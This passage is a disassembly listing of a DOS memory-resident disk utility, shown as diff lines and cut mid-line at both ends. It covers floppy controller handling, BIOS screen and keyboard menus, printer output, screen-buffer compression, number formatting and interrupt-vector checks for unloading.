ds:[21Bh],ax + call sub_49 + call sub_53 + call sub_50 + mov ax,word ptr ds:[21Bh] + sub ax,200h +loc_109: + mov di,offset data_214 + add di,ax + mov al,data_56 + cbw ; Convrt byte to word + cmp al,9 + jne loc_110 ; Jump if not equal + clc ; Clear carry flag + rcr ax,1 ; Rotate thru carry + adc ax,0 +loc_110: + mov cx,ax + mov si,word ptr ds:[229h] +loc_111: + mov bx,225h + mov ax,[bx+si] + mov bx,[di] + or ax,bx + cld ; Clear direction + stosw ; Store ax to es:[di] + xor si,2 + nop ;*ASM fixup - sign extn byte + jz loc_112 ; Jump if zero + dec di +loc_112: + dec cx + jnz loc_111 ; Jump if not zero + mov word ptr ds:[21Dh],di + jmp short loc_114 + db 90h +loc_113: + cmp ax,200h + jl loc_114 ; Jump if 
< + call sub_49 + call sub_53 + call sub_50 +loc_114: + mov word ptr ds:[21Bh],ax + mov al,data_56 + cbw ; Convrt byte to word + add word ptr ds:[223h],ax + mov ax,word ptr ds:[21Bh] + mov cx,word ptr ds:[218h] + mov si,word ptr ds:[214h] + shr cx,1 ; Shift w/zeros fill + jz loc_115 ; Jump if zero + jmp loc_108 +loc_115: + inc word ptr ds:[212h] + mov ax,word ptr ds:[212h] + cmp ax,word ptr ds:[216h] + je loc_116 ; Jump if equal + jmp loc_107 +loc_116: + call sub_49 + call sub_54 + mov di,data_100 + mov ax,word ptr ds:[243Fh] + xchg ah,al + cld ; Clear direction + stosw ; Store ax to es:[di] + mov ax,word ptr ds:[243Dh] + xchg ah,al + stosw ; Store ax to es:[di] + mov ax,word ptr data_98 + stosw ; Store ax to es:[di] + mov data_100,di + inc data_95 + inc data_99 + call sub_12 + mov al,data_96 + cmp data_95,al + je loc_119 ; Jump if equal +loc_117: + mov byte ptr ds:[230h],1 + mov ds,data_25 + mov byte ptr ds:dsk_motor_tmr_,2 + push cs + pop ds + mov data_92,3AAh + call sub_45 + mov cx,88h + +locloop_118: + call sub_7 + call sub_9 + mov cx,word ptr ds:[22Bh] + mov data_82,1596h + loop locloop_118 ; Loop if cx > 0 + + jmp loc_79 +loc_119: + mov data_92,3C2h + call sub_45 + mov data_107,2 + mov data_110,0Ch +loc_120: + mov data_81,130Dh + mov byte ptr ds:[230h],0 + call sub_8 +loc_121: + and byte ptr ds:[22Eh],0 + mov sp,2B84h + mov ax,202h + push ax + push cs + mov ax,data_81 + push ax + mov word ptr cs:[1DCh],sp +loc_122: + mov ss,word ptr ds:[20Eh] + mov sp,word ptr ds:[208h] + mov es,word ptr ds:[210h] + mov bp,word ptr ds:[20Ah] + mov si,word ptr ds:[204h] + mov di,word ptr ds:[206h] + mov ax,word ptr ds:[1FCh] + mov bx,word ptr ds:[1FEh] + mov cx,word ptr ds:[200h] + mov dx,word ptr ds:[202h] + mov ds,word ptr ds:[20Ch] + iret ; Interrupt return +loc_123: + mov byte ptr ds:[22Fh],0 + mov dx,3F2h + mov al,8 + out dx,al ; port 3F2h, dsk0 contrl output + cmp byte ptr ds:[230h],0 + je loc_124 ; Jump if equal + jmp loc_117 +loc_124: + mov data_62,80h +loc_125: + mov 
data_92,3B6h + call sub_45 + call sub_12 + mov byte ptr ds:[22Dh],6 + call sub_7 + call sub_12 + call sub_8 + mov data_81,195Dh + jmp short loc_121 +sub_6 endp + +loc_126: + and byte ptr cs:[22Eh],7Fh + call sub_28 + jnc loc_128 ; Jump if carry=0 + clc ; Clear carry flag + call sub_11 + test byte ptr ds:[22Eh],20h ; ' ' + jnz loc_127 ; Jump if not zero + jmp loc_121 +loc_127: + jmp loc_120 +loc_128: + call sub_22 + call sub_23 + call sub_56 + call sub_20 + cmp data_62,80h + je loc_129 ; Jump if equal + cmp data_62,3 + je loc_132 ; Jump if equal + cmp data_62,40h ; '@' + je loc_131 ; Jump if equal + cmp data_62,20h ; ' ' + je loc_130 ; Jump if equal + mov dh,0Ah + mov dl,1Eh + mov si,441h + call sub_14 + jmp short loc_133 + db 90h +loc_129: + mov dh,0Ah + mov dl,20h ; ' ' + mov si,3DAh + call sub_14 + jmp short loc_133 + db 90h +loc_130: + mov dh,0Ah + mov dl,18h + mov si,420h + call sub_14 + jmp short loc_133 + db 90h +loc_131: + mov dh,0Ah + mov dl,22h ; '"' + mov si,402h + call sub_14 + jmp short loc_133 + db 90h +loc_132: + mov dh,0Ah + mov dl,1Dh + mov si,3EBh + call sub_14 +loc_133: + mov dh,0Eh + mov dl,20h ; ' ' + mov data_62,0 + mov si,40Fh + call sub_14 + call sub_13 +loc_134: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_135 ; Jump if equal + and al,0DFh + cmp al,52h ; 'R' + je loc_136 ; Jump if equal + cmp al,41h ; 'A' + je loc_135 ; Jump if equal + call sub_11 + jmp short loc_134 +loc_135: + call sub_24 + mov data_107,0 + mov data_110,6 + jmp loc_120 +loc_136: + call sub_24 + cli ; Disable interrupts + mov byte ptr ds:[22Eh],0C0h + call sub_7 + call sub_65 + mov cx,5 + jmp data_82 +loc_137: + call sub_19 + mov dh,0Dh + mov dl,15h + mov si,457h + call sub_14 + call sub_13 +loc_138: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_144 ; Jump if equal + cmp al,0Dh + je loc_139 ; Jump if equal + call sub_11 + jmp short loc_138 +loc_139: + 
call sub_19 + mov dh,0Dh + mov dl,21h ; '!' + mov si,47Fh + call sub_14 + call sub_13 + mov bp,0A2Bh +loc_140: + mov ah,2 + xor dx,dx ; Zero register + int 17h ; Printer dx=prn1, ah=func 02h + ; read status, ah=return status + test ah,10h + jz loc_143 ; Jump if zero + mov al,[bp] + cmp al,0 + je loc_144 ; Jump if equal + xor ah,ah ; Zero register + xor dx,dx ; Zero register + int 17h ; Printer dx=prn1, ah=func 00h + ; print char al, get status ah + test ah,29h ; ')' + jnz loc_141 ; Jump if not zero + inc bp + jmp short loc_140 +loc_141: + call sub_19 + mov dh,0Ch + mov dl,23h ; '#' + mov si,48Dh +loc_142: + call sub_14 + mov data_82,1A2Eh + jmp loc_74 +loc_143: + call sub_19 + mov dh,0Ch + mov dl,1Eh + mov si,499h + jmp short loc_142 +loc_144: + jmp loc_41 +loc_145: + cmp data_95,0 + jne loc_147 ; Jump if not equal + call sub_19 + mov dh,0Dh + mov dl,20h ; ' ' + mov si,38Dh + call sub_14 +loc_146: + mov dh,0Fh + mov dl,16h + mov si,368h + call sub_14 + call sub_13 + jmp short loc_148 + db 90h +loc_147: + mov ax,838h + mov cs:data_93,ax + call sub_21 + call sub_31 +loc_148: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + mov data_107,5 + mov data_110,15h + jmp loc_41 +loc_149: + cmp data_187,6666h + je loc_150 ; Jump if equal + mov data_187,6666h + jmp loc_41 +loc_150: + mov data_187,206Eh + jmp loc_41 +loc_151: + mov ax,11E0h + mov di,20h ; (' ') + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,12E6h + mov di,offset data_42 + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,12CCh + mov di,offset data_38 + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,127Ah + mov di,24h ; (' ') + call sub_30 + jnc loc_153 ; Jump if carry=0 +loc_152: + clc ; Clear carry flag + call sub_19 + mov dh,0Ch + mov dl,8 + mov si,327h + call sub_14 + jmp loc_146 +loc_153: + xor ax,ax ; Zero register + mov word ptr data_24,ax + mov si,offset 195h + mov di,20h ; (' ') + call sub_29 + mov si,offset 199h + mov di,24h ; (' ') + call 
sub_29
+ mov si,offset 19Dh
+ mov di,offset data_38
+ call sub_29
+ mov si,offset 1A1h
+ mov di,offset data_42
+ call sub_29
+ mov es,data_26
+ mov di,data_2e
+ xor ax,ax ; Zero register
+ stosw ; Store ax to es:[di]
+ mov es,data_27
+ mov di,data_2e
+ xor ax,ax ; Zero register
+ stosw ; Store ax to es:[di]
+ push cs
+ pop es
+ call sub_24
+ call sub_7
+loc_154:
+ mov data_107,0
+ mov data_110,6
+ call sub_24
+ jmp loc_121
+
+;
+; SUBROUTINE
+;
+
+sub_7 proc near
+ add byte ptr ds:[22Dh],1
+ cli ; Disable interrupts
+ mov word ptr ds:[1D0h],ax
+ pop ax
+ pushf ; Push flags
+ push cs
+ push ax
+ mov word ptr ds:[1DCh],sp
+ mov word ptr ds:[1D2h],bx
+ mov word ptr ds:[1DAh],ss
+ mov word ptr ds:[1E2h],ds
+ mov word ptr ds:[1E4h],es
+ mov word ptr ds:[1E0h],bp
+ mov word ptr ds:[1D8h],si
+ mov word ptr ds:[1DEh],di
+ mov word ptr ds:[1D4h],cx
+ mov word ptr ds:[1D6h],dx
+ jmp loc_122
+sub_7 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_8 proc near
+ mov al,data_29
+ cbw ; Convrt byte to word
+ mov di,ax
+ mov ds,data_25
+ and byte ptr ds:hdsk0_media_st_[di],0EFh
+ mov byte ptr ds:dsk_motor_tmr_,2
+ mov byte ptr ds:dsk_recal_stat_,0
+ push cs
+ pop ds
+ retn
+sub_8 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_9 proc near
+ mov word ptr ds:[22Bh],cx
+ test byte ptr ds:[22Eh],20h ; ' '
+ jz loc_ret_155 ; Jump if zero
+ pop ax
+ mov data_82,ax
+ jmp loc_126
+
+loc_ret_155:
+ retn
+sub_9 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_10 proc near
+ mov ah,0Eh
+ mov bh,0
+ int 10h ; Video display ah=functn 0Eh
+ ; write char al, teletype mode
+ retn
+sub_10 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_11 proc near
+ push ax
+ push bx
+ mov al,7
+ call sub_10
+ pop bx
+ pop ax
+ retn
+sub_11 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_12 proc near
+ call sub_7
+ mov al,0B6h
+ out 43h,al ; port 43h, 8253 wrt timr mode
+ mov ax,180h
+ out 42h,al ; port 42h, 8253 timer 2 spkr
+ mov al,ah
+ out 42h,al ; port 42h, 8253 timer 2 spkr
+ in al,61h ; port 61h, 8255 port B, read
+ or al,3
+ out 61h,al ; port 61h, 8255 B - spkr, etc
+ call sub_7
+ in al,61h ; port 61h, 8255 port B, read
+ and al,0FCh
+ out 61h,al ; port 61h, 8255 B - spkr, etc
+ ; al = 0, disable parity
+ retn
+sub_12 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_13 proc near
+ mov ah,2
+ mov dx,2000h
+ mov bh,data_104
+ int 10h ; Video display ah=functn 02h
+ ; set cursor location in dx
+ retn
+sub_13 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_14 proc near
+ mov ah,2
+ mov bh,0
+ int 10h ; Video display ah=functn 02h
+ ; set cursor location in dx
+ call sub_15
+ retn
+sub_14 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_15 proc near
+loc_156:
+ cld ; Clear direction
+ lodsb ; String [si] to al
+ cmp al,0
+ je loc_ret_157 ; Jump if equal
+ mov ah,0Eh
+ mov bh,0
+ int 10h ; Video display ah=functn 0Eh
+ ; write char al, teletype mode
+ jmp short loc_156
+
+loc_ret_157:
+ retn
+sub_15 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_16 proc near
+loc_158:
+ mov ah,0
+ int 16h ; Keyboard i/o ah=function 00h
+ ; get keybd char in al, ah=scan
+ cmp al,1Bh
+ jne loc_159 ; Jump if not equal
+ pop ax
+ jmp data_89
+loc_159:
+ cmp al,0Dh
+ jne loc_160 ; Jump if not equal
+ mov al,data_103
+ jmp short loc_161
+ db 90h
+loc_160:
+ cmp al,30h ; '0'
+ jl loc_162 ; Jump if <
+ cmp al,data_102
+ jg loc_162 ; Jump if >
+loc_161:
+ and ax,7
+ retn
+loc_162:
+ call sub_11
+ jmp short loc_158
+sub_16 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_17 proc near
+ mov cx,0FA0h
+ shr cx,1 ; Shift w/zeros fill
+ cld ; Clear direction
+ lodsb ; String [si] to al
+ inc si
+ xchg ah,al
+loc_163:
+ lodsb ; String [si] to al
+ dec cx
+ jz loc_165 ; Jump if zero
+ inc si
+ cmp ah,al
+ jne loc_164 ; Jump if not equal
+ inc bx
+ jmp short loc_163
+loc_164:
+ call sub_26
+ jmp short loc_163
+loc_165:
+ call sub_26
+ retn
+sub_17 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_18 proc near
+ push ds
+ push es
+ mov si,data_1e
+ mov di,data_16e
+ mov bx,0
+ mov ds,cs:data_91
+ mov es,cs:data_91
+ call sub_17
+ mov si,data_2e
+ mov bx,0
+ call sub_17
+ pop es
+ pop ds
+ retn
+sub_18 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_19 proc near
+ mov ax,4ADh
+ mov data_93,ax
+ call sub_21
+ retn
+sub_19 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_20 proc near
+ mov ax,6F7h
+ mov data_93,ax
+ call sub_21
+ retn
+sub_20 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_21 proc near
+ push cx
+ push dx
+ push si
+ push di
+ push ax
+ xor di,di ; Zero register
+ mov si,cs:data_93
+loc_166:
+ lodsb ; String [si] to al
+ cmp al,1
+ jne loc_169 ; Jump if not equal
+ lodsw ; String [si] to ax
+ mov cx,ax
+ test cl,80h
+ jz loc_167 ; Jump if zero
+ xchg ch,cl
+ and cx,7FFFh
+ lodsb ; String [si] to al
+ jmp short locloop_168
+ db 90h
+loc_167:
+ xchg al,ah
+ and cx,7Fh
+
+locloop_168:
+ call sub_25
+ loop locloop_168 ; Loop if cx > 0
+
+ jmp short loc_170
+ db 90h
+loc_169:
+ call sub_25
+loc_170:
+ cmp di,0FA0h
+ jl loc_166 ; Jump if <
+ jnz loc_171 ; Jump if not zero
+ mov di,1
+ jmp short loc_166
+loc_171:
+ pop ax
+ pop di
+ pop si
+ pop dx
+ pop cx
+ retn
+sub_21 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_22 proc near
+ push ds
+ mov ds,data_91
+ mov si,data_4e
+ mov di,offset data_115
+ mov cx,7
+ cld ; Clear direction
+ repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di]
+ pop ds
+ cmp cx,0
+ jne loc_ret_172 ; Jump if not equal
+ mov data_92,0D5h
+ call sub_44
+
+loc_ret_172:
+ retn
+sub_22 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_23 proc near
+ mov ah,0Fh
+ int 10h ; Video display ah=functn 0Fh
+ ; get state, al=mode, bh=page
+ ; ah=columns on screen
+ mov ah,3
+ int 10h ; Video display ah=functn 03h
+ ; get cursor loc in dx, mode cx
+ mov data_104,bh
+ mov data_105,cx
+ mov data_106,dx
+ call sub_18
+ retn
+sub_23 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_24 proc near
+ mov data_93,1000h
+ mov ax,data_91
+ push ds
+ mov ds,ax
+ call sub_21
+ pop ds
+ mov bh,data_104
+ mov dx,data_106
+ mov ah,2
+ int 10h ; Video display ah=functn 02h
+ ; set cursor location in dx
+ mov ah,1
+ mov cx,data_105
+ int 10h ; Video display ah=functn 01h
+ ; set cursor mode in cx
+ retn
+sub_24 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_25 proc near
+ push es
+ mov 
es,cs:data_91 + mov dx,cs:data_90 + cli ; Disable interrupts + push ax +loc_173: + in al,dx ; port 0, DMA-1 bas&add ch 0 + test al,1 + jnz loc_173 ; Jump if not zero +loc_174: + in al,dx ; port 0, DMA-1 bas&add ch 0 + test al,1 + jz loc_174 ; Jump if zero + pop ax + mov es:[di],al + sti ; Enable interrupts + inc di + inc di + pop es + retn +sub_25 endp + + +; +; SUBROUTINE +; + +sub_26 proc near + cmp ah,1 + je loc_175 ; Jump if equal + cmp bx,0 + je loc_178 ; Jump if equal + cmp bx,1 + jne loc_175 ; Jump if not equal + xor bx,bx ; Zero register + xchg ah,al + stosb ; Store al to es:[di] + jmp short loc_179 + db 90h +loc_175: + push ax + inc bx + mov al,1 + stosb ; Store al to es:[di] + mov ax,bx + and bx,0FF80h + nop ;*ASM fixup - sign extn byte + jz loc_176 ; Jump if zero + or ax,8000h + xchg ah,al + stosw ; Store ax to es:[di] + jmp short loc_177 + db 90h +loc_176: + stosb ; Store al to es:[di] +loc_177: + xor bx,bx ; Zero register + pop ax +loc_178: + xchg ah,al +loc_179: + stosb ; Store al to es:[di] + retn +sub_26 endp + + +; +; SUBROUTINE +; + +sub_27 proc near + mov al,data_110 + mul data_111 ; ax = data * al + add ax,3Dh + mov di,ax + mov al,data_112 + mov cl,15h +loc_180: + call sub_25 + dec cl + cmp cl,0 + jne loc_180 ; Jump if not equal + retn +sub_27 endp + + +; +; SUBROUTINE +; + +sub_28 proc near + mov ds,data_25 + cmp byte ptr ds:video_mode_,7 + je loc_183 ; Jump if equal + cmp byte ptr ds:video_mode_,2 + je loc_182 ; Jump if equal + cmp byte ptr ds:video_mode_,3 + je loc_182 ; Jump if equal +loc_181: + push cs + pop ds + stc ; Set carry flag + retn +loc_182: + push cs + pop ds + clc ; Clear carry flag + retn +loc_183: + mov ds,cs:data_91 + xor si,si ; Zero register + mov cx,50h + xor bx,bx ; Zero register + cld ; Clear direction + +locloop_184: + lodsw ; String [si] to ax + cmp ah,al + jne loc_185 ; Jump if not equal + inc bx +loc_185: + loop locloop_184 ; Loop if cx > 0 + + cmp bx,0Ah + jg loc_181 ; Jump if > + jmp short loc_182 +sub_28 endp + + 
+; +; SUBROUTINE +; + +sub_29 proc near + mov cx,2 + mov es,data_25 + cld ; Clear direction + cli ; Disable interrupts + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + sti ; Enable interrupts + retn +sub_29 endp + + +; +; SUBROUTINE +; + +sub_30 proc near + clc ; Clear carry flag + mov word ptr ds:[1F0h],es + mov es,data_25 + cmp ax,es:[di] + jne loc_186 ; Jump if not equal + push cs + pop ax + cmp ax,es:[di+2] + je loc_187 ; Jump if equal +loc_186: + stc ; Set carry flag +loc_187: + mov es,word ptr ds:[1F0h] + retn +sub_30 endp + + +; +; SUBROUTINE +; + +sub_31 proc near + mov data_100,0F5h + mov data_97,9 + mov data_95,1 +loc_188: + mov al,data_95 + cbw ; Convrt byte to word + mov word ptr ds:[1A9h],0 + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,7 + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov si,data_100 + mov di,3A0h + cld ; Clear direction + call sub_35 + inc di + call sub_35 + mov data_100,si + mov dh,data_97 + mov dl,14h + mov si,3A0h + call sub_14 + mov si,data_100 + lodsw ; String [si] to ax + mov word ptr data_98,ax + mov data_100,si + mov word ptr ds:[1A9h],0 + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,2Dh ; '-' + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov bl,50h ; 'P' + xor bh,bh ; Zero register + cmp data_31,0 + jne loc_189 ; Jump if not equal + shr bx,1 ; Shift w/zeros fill +loc_189: + dec bx + mov ax,2 + mul bx ; dx:ax = reg * ax + mov bl,data_56 + xor bh,bh ; Zero register + mul bx ; dx:ax = reg * ax + mov bl,data_53 + add ax,bx + mov bx,word ptr data_98 + cmp byte ptr ds:[2423h],1 + je loc_190 ; Jump if equal + shl bx,1 ; Shift w/zeros fill +loc_190: + sub ax,bx + mov bx,200h + mul bx ; dx:ax = reg * ax + mov word ptr ds:[1A9h],dx + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,44h ; 'D' + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov al,data_99 + cmp data_95,al + jne loc_191 ; Jump if not equal + 
call sub_13 + retn +loc_191: + inc data_95 + inc data_97 + jmp loc_188 +sub_31 endp + + +; +; SUBROUTINE +; + +sub_32 proc near + mov di,0EDh + call sub_33 + mov word ptr ds:[1ADh],bx + mov byte ptr ds:[1AFh],bl + jz loc_195 ; Jump if zero +loc_192: + cld ; Clear direction + or al,30h ; '0' + stosb ; Store al to es:[di] + mov word ptr ds:[1A5h],0 + mov word ptr ds:[1A7h],0 + push di + mov di,word ptr ds:[1B0h] + add di,word ptr ds:[1B2h] + call sub_34 + pop di + mov ax,word ptr ds:[1A7h] + sub word ptr ds:[1ABh],ax + jnc loc_193 ; Jump if carry=0 + dec word ptr ds:[1A9h] +loc_193: + mov ax,word ptr ds:[1A5h] + sub word ptr ds:[1A9h],ax + dec word ptr ds:[1ADh] + cmp word ptr ds:[1ADh],0 + je loc_195 ; Jump if equal + call sub_33 +loc_194: + cmp bx,word ptr ds:[1ADh] + je loc_192 ; Jump if equal + push ax + mov al,30h ; '0' + stosb ; Store al to es:[di] + pop ax + dec word ptr ds:[1ADh] + cmp word ptr ds:[1ADh],0 + jne loc_194 ; Jump if not equal +loc_195: + mov ax,word ptr ds:[1ABh] + or al,30h ; '0' + cld ; Clear direction + stosb ; Store al to es:[di] + mov al,0 + stosb ; Store al to es:[di] + retn +sub_32 endp + + +; +; SUBROUTINE +; + +sub_33 proc near + mov dx,word ptr ds:[1A9h] + mov ax,word ptr ds:[1ABh] + mov word ptr ds:[1B0h],0 + mov word ptr ds:[1B2h],0 + cmp dx,0 + jne loc_196 ; Jump if not equal + cmp ax,2710h + jb loc_197 ; Jump if below +loc_196: + mov bx,2710h + mov word ptr ds:[1B0h],8 + div bx ; ax,dx rem=dx:ax/reg +loc_197: + cmp ax,0Ah + jb loc_200 ; Jump if below + mov word ptr ds:[1B2h],6 + xor dx,dx ; Zero register + mov bx,offset 1C8h +loc_198: + cmp ax,[bx] + jge loc_199 ; Jump if > or = + sub word ptr ds:[1B2h],2 + sub bx,2 + jmp short loc_198 +loc_199: + mov bx,[bx] + div bx ; ax,dx rem=dx:ax/reg +loc_200: + mov bx,word ptr ds:[1B0h] + add bx,word ptr ds:[1B2h] + shr bx,1 ; Shift w/zeros fill + retn +sub_33 endp + + +; +; SUBROUTINE +; + +sub_34 proc near + and al,0Fh + cbw ; Convrt byte to word + push ax + mov bx,offset 1C2h + mov 
bx,[bx+di] + mul bx ; dx:ax = reg * ax + add word ptr ds:[1A7h],ax + jnc loc_201 ; Jump if carry=0 + inc dx +loc_201: + add word ptr ds:[1A5h],dx + mov bx,offset 1B4h + pop ax + mov bx,[bx+di] + mul bx ; dx:ax = reg * ax + add word ptr ds:[1A5h],ax + retn +sub_34 endp + + +; +; SUBROUTINE +; + +sub_35 proc near + lodsb ; String [si] to al + call sub_36 + stosw ; Store ax to es:[di] + lodsb ; String [si] to al + call sub_36 + stosw ; Store ax to es:[di] + retn +sub_35 endp + + +; +; SUBROUTINE +; + +sub_36 proc near + mov ah,al + and ah,0Fh + mov cl,4 + shr al,cl ; Shift w/zeros fill + and al,0Fh + cmp al,0Ah + jge loc_202 ; Jump if > or = + add al,30h ; '0' + jmp short loc_203 + db 90h +loc_202: + add al,37h ; '7' +loc_203: + cmp ah,0Ah + jge loc_204 ; Jump if > or = + add ah,30h ; '0' + jmp short loc_ret_205 + db 90h +loc_204: + add ah,37h ; '7' + +loc_ret_205: + retn +sub_36 endp + + +; +; SUBROUTINE +; + +sub_37 proc near + mov al,data_29 + mov bx,offset data_30 + cbw ; Convrt byte to word + add bx,ax + mov al,[bx] + mov data_31,ax + retn +sub_37 endp + + +; +; SUBROUTINE +; + +sub_38 proc near + mov ah,1 + mov cx,7 + int 10h ; Video display ah=functn 01h + ; set cursor mode in cx + mov ah,3 + mov bh,data_104 + int 10h ; Video display ah=functn 03h + ; get cursor loc in dx, mode cx + mov data_108,dh + mov data_109,dl + mov di,137h + mov data_101,0 +loc_206: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + jne loc_207 ; Jump if not equal + retn +loc_207: + cmp al,1Bh + jne loc_208 ; Jump if not equal + pop ax + jmp loc_41 +loc_208: + cmp al,10h + je loc_209 ; Jump if equal + cmp ax,5300h + jne loc_210 ; Jump if not equal +loc_209: + call sub_41 + call sub_41 + jmp short loc_206 +loc_210: + cmp ax,4B00h + je loc_211 ; Jump if equal + cmp al,8 + jne loc_212 ; Jump if not equal +loc_211: + call sub_41 + jmp short loc_206 +loc_212: + cmp al,30h ; '0' + jb loc_213 ; Jump if below + cmp al,39h ; '9' + jg loc_213 ; 
Jump if > + cmp data_101,2 + je loc_213 ; Jump if equal + cld ; Clear direction + stosb ; Store al to es:[di] + inc data_101 + inc data_109 + call sub_10 + jmp short loc_206 +loc_213: + call sub_11 + jmp short loc_206 +sub_38 endp + + +; +; SUBROUTINE +; + +sub_39 proc near + mov si,offset data_33+6 ; (' ') +loc_214: + cmp al,0 + je loc_215 ; Jump if equal + add si,7 + dec al + jmp short loc_214 +loc_215: + mov di,offset data_189 +loc_216: + lodsb ; String [si] to al + cmp al,0 + jne loc_217 ; Jump if not equal + retn +loc_217: + stosb ; Store al to es:[di] +sub_39 endp + + +; +; SUBROUTINE +; + +sub_40 proc near + jmp short loc_216 +sub_40 endp + + +; +; SUBROUTINE +; + +sub_41 proc near + cmp data_101,0 + je loc_ret_218 ; Jump if equal + dec di + dec data_101 + dec data_109 + call sub_42 + mov al,20h ; ' ' + call sub_10 + call sub_42 + +loc_ret_218: + retn +sub_41 endp + + +; +; SUBROUTINE +; + +sub_42 proc near + mov ah,2 + mov bh,data_104 + mov dh,data_108 + mov dl,data_109 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + retn +sub_42 endp + + +; +; SUBROUTINE +; + +sub_43 proc near + push ds + mov ds,data_91 + mov si,data_4e + mov di,offset data_115 + mov cx,7 + cld ; Clear direction + repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 + je loc_219 ; Jump if equal + mov di,offset data_113 + mov si,data_4e + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] +loc_219: + pop ds + call sub_44 + mov di,offset data_115 + mov si,data_92 + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_43 endp + + +; +; SUBROUTINE +; + +sub_44 proc near + push es + mov si,data_92 + mov es,data_91 + mov di,data_4e + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + pop es + retn +sub_44 endp + + +; +; SUBROUTINE +; + +sub_45 proc near + call sub_28 + jnc loc_220 ; Jump if carry=0 + retn +loc_220: + call sub_43 + retn +sub_45 endp + + +; +; SUBROUTINE +; + +sub_46 proc near + call sub_28 + jnc loc_221 ; Jump if 
carry=0 + clc ; Clear carry flag + retn +loc_221: + cmp data_187,6666h + je loc_222 ; Jump if equal + mov data_92,3CEh + mov ah,data_65 + call sub_47 + mov byte ptr data_184+26h,al ; ('') + mov byte ptr data_184+28h,ah ; ('') + call sub_43 + retn +loc_222: + cmp data_92,3AAh + jne loc_ret_223 ; Jump if not equal + mov data_92,0D5h + call sub_44 + +loc_ret_223: + retn +sub_46 endp + + +; +; SUBROUTINE +; + +sub_47 proc near + cmp ah,0Ah + jl loc_226 ; Jump if < + mov al,31h ; '1' +loc_224: + sub ah,0Ah + cmp ah,0Ah + jl loc_225 ; Jump if < + add al,1 + jmp short loc_224 +loc_225: + or ah,30h ; '0' + retn +loc_226: + or ah,30h ; '0' + mov al,20h ; ' ' + retn +sub_47 endp + + +; +; SUBROUTINE +; + +sub_48 proc near + cld ; Clear direction + mov di,offset 14Dh +loc_227: + mov al,data_65 + stosb ; Store al to es:[di] + mov al,data_64 + stosb ; Store al to es:[di] + mov al,data_66 + stosb ; Store al to es:[di] + mov al,2 + stosb ; Store al to es:[di] + inc data_66 + mov al,data_66 + cmp al,data_56 + jle loc_227 ; Jump if < or = + mov data_66,1 + retn +sub_48 endp + + +; +; SUBROUTINE +; + +sub_49 proc near + pop ax + mov word ptr ds:[221h],ax + mov data_82,21E2h + mov al,byte ptr ds:[21Ah] + mov data_66,al + mov data_68,28E9h + mov data_67,1FFh + mov data_69,4Ah ; 'J' + mov data_70,0C5h + mov data_85,27F1h + call sub_75 + mov data_82,220Dh + mov ax,word ptr ds:[242Ch] + mov cl,byte ptr ds:[21Ah] + add cl,al + cmp cl,data_56 + jle loc_228 ; Jump if < or = + inc data_64 + sub cl,data_56 +loc_228: + mov data_66,cl + call sub_75 + inc byte ptr ds:[21Ah] + jmp word ptr ds:[221h] + +; External Entry into Subroutine + +sub_50: + mov si,offset data_220 + mov cx,word ptr ds:[21Dh] + inc cx + sub cx,si + jbe loc_229 ; Jump if below or = + mov di,offset data_214 + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + xor al,al ; Zero register + mov cx,1Bh + mov di,offset data_220 + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] +loc_229: + add word ptr 
